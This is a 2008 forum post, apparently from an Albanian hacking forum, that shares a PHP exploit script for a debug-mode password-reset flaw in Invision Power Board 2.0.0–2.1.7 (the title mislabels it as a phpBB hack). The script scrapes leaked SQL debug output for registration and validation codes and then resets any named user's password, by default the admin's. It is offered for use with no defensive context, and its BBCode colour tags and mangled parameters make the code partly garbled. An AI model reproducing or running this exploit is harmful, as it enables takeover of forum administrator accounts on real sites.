p!rAt-xXx
Webmaster
Numri i postimeve : 232
Location : System32
Job/hobbies : HaCk3r iN kOsoVA
Registration date : 04/02/2008
 | Titulli: Shikoni kete exploit e gjeta hte eshte per Hack Phbb  Fri Mar 07, 2008 3:05 am | |
| Kodet PHP: - Kodi:
-
[color=#0000bb]<?php
[/color][color=#ff8000]// -----------------------------
//Debug Mode password change vulnerability
//Affects Invision Power Borard 2.0.0 to 2.1.7
//by Rapigator
//This works if:
//"Debug Level" is set to 3
//or
//Enable SQL Debug Mode is turned on
//In General Configuration of the forum software.
// The forum's address up to and including 'index.php'
[/color][color=#0000bb]$site [/color][color=#007700]= [/color][color=#dd0000]"http://localhost/forums/index.php"[/color][color=#007700];
[/color][color=#ff8000]// An existing user's login name
[/color][color=#0000bb]$name [/color][color=#007700]= [/color][color=#dd0000]"admin"[/color][color=#007700];
[/color][color=#ff8000]// The new password(3-32 characters)
[/color][color=#0000bb]$pass [/color][color=#007700]= [/color][color=#dd0000]"1234"[/color][color=#007700];
[/color][color=#ff8000]// You can use a proxy...
// $proxy = "1.2.3.4:8080";
// -----------------------------
[/color][color=#0000bb]$site [/color][color=#007700].= [/color][color=#dd0000]"?"[/color][color=#007700];
[/color][color=#0000bb]$suffix [/color][color=#007700]= [/color][color=#dd0000]""[/color][color=#007700];
[/color][color=#0000bb]$name [/color][color=#007700]= [/color][color=#0000bb]urlencode[/color][color=#007700]([/color][color=#0000bb]$name[/color][color=#007700]);
[/color][color=#0000bb]$pass [/color][color=#007700]= [/color][color=#0000bb]urlencode[/color][color=#007700]([/color][color=#0000bb]$pass[/color][color=#007700]);
[/color][color=#0000bb]$curl [/color][color=#007700]= [/color][color=#0000bb]curl_init[/color][color=#007700]([/color][color=#0000bb]$site[/color][color=#007700].[/color][color=#dd0000]'act=Reg&CODE=10'[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_PROXY[/color][color=#007700], [/color][color=#0000bb]$proxy[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_RETURNTRANSFER[/color][color=#007700], [/color][color=#0000bb]1[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_TIMEOUT[/color][color=#007700], [/color][color=#0000bb]10[/color][color=#007700]);
[/color][color=#0000bb]$page [/color][color=#007700]= [/color][color=#0000bb]curl_exec[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
[/color][color=#0000bb]curl_close[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
if ([/color][color=#0000bb]preg_match[/color][color=#007700]([/color][color=#dd0000]'/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'[/color][color=#007700], [/color][color=#0000bb]$page[/color][color=#007700], [/color][color=#0000bb]$regs[/color][color=#007700])) {
[/color][color=#0000bb]$prefix [/color][color=#007700]= [/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]1[/color][color=#007700]];
[/color][color=#0000bb]$regid [/color][color=#007700]= [/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]2[/color][color=#007700]];
[/color][color=#0000bb]$regcode [/color][color=#007700]= [/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]3[/color][color=#007700]];
} else {
[/color][color=#0000bb]$suffix [/color][color=#007700]= [/color][color=#dd0000]"&debug=1"[/color][color=#007700];
[/color][color=#0000bb]$curl [/color][color=#007700]= [/color][color=#0000bb]curl_init[/color][color=#007700]([/color][color=#0000bb]$site[/color][color=#007700].[/color][color=#dd0000]'act=Reg&CODE=10'[/color][color=#007700].[/color][color=#0000bb]$suffix[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_PROXY[/color][color=#007700], [/color][color=#0000bb]$proxy[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_RETURNTRANSFER[/color][color=#007700], [/color][color=#0000bb]1[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_TIMEOUT[/color][color=#007700], [/color][color=#0000bb]10[/color][color=#007700]);
[/color][color=#0000bb]$page [/color][color=#007700]= [/color][color=#0000bb]curl_exec[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
[/color][color=#0000bb]curl_close[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
if ([/color][color=#0000bb]preg_match[/color][color=#007700]([/color][color=#dd0000]'/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'[/color][color=#007700], [/color][color=#0000bb]$page[/color][color=#007700], [/color][color=#0000bb]$regs[/color][color=#007700])) {
[/color][color=#0000bb]$prefix [/color][color=#007700]= [/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]1[/color][color=#007700]];
[/color][color=#0000bb]$regid [/color][color=#007700]= [/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]2[/color][color=#007700]];
[/color][color=#0000bb]$regcode [/color][color=#007700]= [/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]3[/color][color=#007700]];
}
}
if (!isset([/color][color=#0000bb]$regid[/color][color=#007700]) || !isset([/color][color=#0000bb]$regcode[/color][color=#007700])) {
echo [/color][color=#dd0000]"Error: Probably not vulnerable, or no forum found"[/color][color=#007700];
exit;
}
[/color][color=#0000bb]$curl [/color][color=#007700]= [/color][color=#0000bb]curl_init[/color][color=#007700]([/color][color=#0000bb]$site[/color][color=#007700].[/color][color=#0000bb]$suffix[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_PROXY[/color][color=#007700], [/color][color=#0000bb]$proxy[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_RETURNTRANSFER[/color][color=#007700], [/color][color=#0000bb]1[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_POST[/color][color=#007700], [/color][color=#0000bb]1[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_POSTFIELDS[/color][color=#007700], [/color][color=#dd0000]"act=Reg&CODE=11&member_name={$name}®id={$regid }®_code={$regcode}"[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_TIMEOUT[/color][color=#007700], [/color][color=#0000bb]10[/color][color=#007700]);
[/color][color=#0000bb]$page [/color][color=#007700]= [/color][color=#0000bb]curl_exec[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
[/color][color=#0000bb]curl_close[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
if ([/color][color=#0000bb]preg_match[/color][color=#007700]([/color][color=#dd0000]'/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'[/color][color=#007700].[/color][color=#0000bb]$prefix[/color][color=#007700].[/color][color=#dd0000]'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'[/color][color=#007700], [/color][color=#0000bb]$page[/color][color=#007700], [/color][color=#0000bb]$regs[/color][color=#007700])) {
[/color][color=#0000bb]change_pass[/color][color=#007700]([/color][color=#0000bb]$regcode[/color][color=#007700],[/color][color=#0000bb]$regid[/color][color=#007700],[/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]1[/color][color=#007700]],[/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]2[/color][color=#007700]]);
}
if ([/color][color=#0000bb]preg_match[/color][color=#007700]([/color][color=#dd0000]'/INSERT INTO '[/color][color=#007700].[/color][color=#0000bb]$prefix[/color][color=#007700].[/color][color=#dd0000]'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'[/color][color=#007700], [/color][color=#0000bb]$page[/color][color=#007700], [/color][color=#0000bb]$regs[/color][color=#007700])) {
[/color][color=#0000bb]change_pass[/color][color=#007700]([/color][color=#0000bb]$regcode[/color][color=#007700],[/color][color=#0000bb]$regid[/color][color=#007700],[/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]1[/color][color=#007700]],[/color][color=#0000bb]$regs[/color][color=#007700][[/color][color=#0000bb]2[/color][color=#007700]]);
}
function [/color][color=#0000bb]change_pass[/color][color=#007700]([/color][color=#0000bb]$regcode[/color][color=#007700],[/color][color=#0000bb]$regid[/color][color=#007700],[/color][color=#0000bb]$vid[/color][color=#007700],[/color][color=#0000bb]$userid[/color][color=#007700]) {
global [/color][color=#0000bb]$site[/color][color=#007700], [/color][color=#0000bb]$proxy[/color][color=#007700], [/color][color=#0000bb]$name[/color][color=#007700], [/color][color=#0000bb]$pass[/color][color=#007700];
[/color][color=#0000bb]$curl [/color][color=#007700]= [/color][color=#0000bb]curl_init[/color][color=#007700]([/color][color=#0000bb]$site[/color][color=#007700].[/color][color=#0000bb]$suffix[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_PROXY[/color][color=#007700], [/color][color=#0000bb]$proxy[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_RETURNTRANSFER[/color][color=#007700], [/color][color=#0000bb]1[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_POST[/color][color=#007700], [/color][color=#0000bb]1[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_POSTFIELDS[/color][color=#007700], [/color][color=#dd0000]"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={ $vid}®id={$regid}®_code={$regcode}&pass1={$p ass}&pass2={$pass}"[/color][color=#007700]);
[/color][color=#0000bb]curl_setopt[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700], [/color][color=#0000bb]CURLOPT_TIMEOUT[/color][color=#007700], [/color][color=#0000bb]10[/color][color=#007700]);
[/color][color=#0000bb]$page [/color][color=#007700]= [/color][color=#0000bb]curl_exec[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
[/color][color=#0000bb]curl_close[/color][color=#007700]([/color][color=#0000bb]$curl[/color][color=#007700]);
echo [/color][color=#dd0000]"Password Changed!"[/color][color=#007700];
exit;
}
[/color][color=#0000bb]?>[/color] | |
|
Forum 